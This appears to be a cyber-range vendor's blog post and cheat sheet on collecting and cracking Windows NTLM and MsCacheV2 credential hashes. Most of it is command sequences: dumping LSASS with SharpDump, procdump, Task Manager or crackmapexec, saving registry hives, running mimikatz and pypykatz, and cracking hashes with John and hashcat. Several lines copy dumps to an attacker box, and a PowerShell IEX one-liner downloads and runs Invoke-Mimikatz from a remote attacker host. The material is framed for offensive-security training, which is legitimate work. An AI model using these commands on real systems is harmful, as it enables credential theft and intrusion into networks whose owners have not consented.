Slayer Labs

Cyber Range Platform

Windows Credential Harvesting Quick Guide

This post will cover some common scenarios on how to collect, dump and decrypt windows credentials - specifcally NTLM and MsCacheV2. Targeted to be a non-exhaustive cheat sheet.


🚨 Be sure to Checkout our Labs to get hands-on experience with Windows credential harvesting and many other offensive security-related techniques.


📡 Lab access is low-cost and includes multiple targets and networks already configured to be exploited - Request Access to get started!

What’s the difference between NTLM and MsCacheV2 hashes?

  • Without getting into the weeds too much, Windows user accounts which are created locally will have NTLM hashes. This differs if the box you’re on is a Domain Controller.

  • Users who are domain joined and log into a Windows machine will have MsCacheV2 hashes.

Mscache is also referenced as Domain Cached Credentials or DCC2 or DCC. The purpose of mscache is for users to still be able to login to their Windows box in the case it cannot reach the domain controller. If your box is unable to reach the domain controller how would you login with your domain account? Answer: Domain cached credentials aka MsCacheV2.

Local (NTLM) accounts however will be able to login if joined or not joined to a domain. Authentication takes place locally, so no need for a domain controller. This is a brief high-level description to keep things short and simple.

Techniques to collect NTLM hashes

Dump LSASS with SharpDump, then move over to box with mimikatz.

sharpdump lsass

# Run sharpdump on target
# Move output (debug bin file) to box with mimikatz and unzip
scp C:\windows\temp\debug644.bin attacker@\Windows\Temp\debug.gz
7z x C:\Windows\Temp\debug.gz -olsass
sekurlsa::minidump lsass

Save SAM and SYSTEM hives on target, then move over to box with mimikatz.

# Save SAM and SYSTEM
reg save hklm\sam C:\ProgramData\system
reg save hklm\system C:\ProgramData\system
lsadump::sam /system:C:\ProgramData\system /sam:C:\ProgramData\sam

Dump LSASS via Task Manager, then move over to box with pypykatz.

# With Windows GUI access, open Task Manager
# Details >> Right click lsass.exe >> Create dump file
# Move over lsass.DMP
scp C:\Users\chester\AppData\Local\Temp\lsass.dmp kali@
# Get hashes with pypykatz
pypykatz lsa minidump /tmp/lsass.DMP

Use procdump on target, then move over to a box with mimikatz.

# Dump lsass
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
# Move over lsass.dmp however necessary 
copy lsass.dmp C:\inetpub\wwwroot\ 
bitsadmin.exe /transfer /download http://target/lsass.dmp C:\loot\lsass.dmp
# Run mimikatz as admin and get hashes (no need to elevate to SYSTEM)
sekurlsa::minidump "C:\loot\lsass.dmp"

Use procdump on target, then move over to a box with pypykatz.

# Dump lsass (AV may catch this)
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
# Move over lsass.dmp
scp lsass.dmp kali@
# Get hashes with pypykatz
pypykatz lsa minidump /tmp/lsass.dmp

Dump LSASS with crackmapexec using known admin creds.

crackmapexec smb TargetIP -u administrator -p hunter2 --lsa

Drop mimikatz.exe on disk and run on target. AV will likely catch this if enabled.

# Run as admin
# Enable debug privs
# Escalate to SYSTEM
# Get ntlm hashes

Load and execute mimikatz from a remote server with powershell. AV will likely catch this.

powershell "IEX (New-Object Net.WebClient).DownloadString('https://AttackerBox/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"


🏆 Our labs are fully networked, non-standalone and engineered to exploit! Request Access to enhance your offensive-cyber skills and put these commands to use!

Techniques to collect MsCacheV2 hashes

Save SAM SYSTEM and SECURITY hives, then move to a kali box with

# Save hives running as SYSTEM user
psexec.exe -accepteula -s -i reg.exe save hklm\system c:\ProgramData\system.hive
psexec.exe -accepteula -s -i reg.exe save hklm\sam c:\ProgramData\sam.hive
psexec.exe -accepteula -s -i reg.exe save hklm\security c:\ProgramData\security.hive
# Move over saved hive files to Kali and run -sam sam.hive  -security security.hive -system system.hive LOCAL

Drop psexec and mimikatz on target, then execute with a one liner.

psexec.exe -accepteula -i -s C:\ProgramData\mimikatz.exe "log C:\ProgramData\log.txt" "lsadump::cache" "exit"

With a meterpreter shell established run the metasploit post module cachedump.


Drop mimikatz.exe on target and execute directly.

# Run as admin
# Enable debug privs
# Escalate to SYSTEM
# Get mscachev2 hashes

Cracking Windows Hashes

Crack NTLM

John the Ripper

# morty:1003:aad3b435b51404eeaad3b435b51404ee:a1d2376cd756bdd877f5307dfa290a5b
john --format=nt  ntlm-dump.txt -w=/usr/share/wordlists/john.lst


# a1d2376cd756bdd877f5307dfa290a5b
hashcat -m 1000 ntlm-dump2.txt /usr/share/wordlists/john.lst

Crack MsCacheV2

Depending on what tool you use to dump mscache, you’ll likely need to format it correctly.

Mimikatz may spit out the hash such as 8935afb3232200c066ceb9658946c57b. Hashcat will need it correctly formatted by prepending $DCC2$10240#USERNAME# to the hash - where USERNAME is the domain SAM account username.

Hashcat & John

# eg: full domain user is nightcity.corp\lazer
# $DCC2$10240#lazer#8935afb3232200c066ceb9658946c57b
hashcat -m 2100 mscach-dump.txt /usr/share/wordlists/john.lst
john mscach-dump.txt -w=/usr/share/wordlists/john.lst


« Back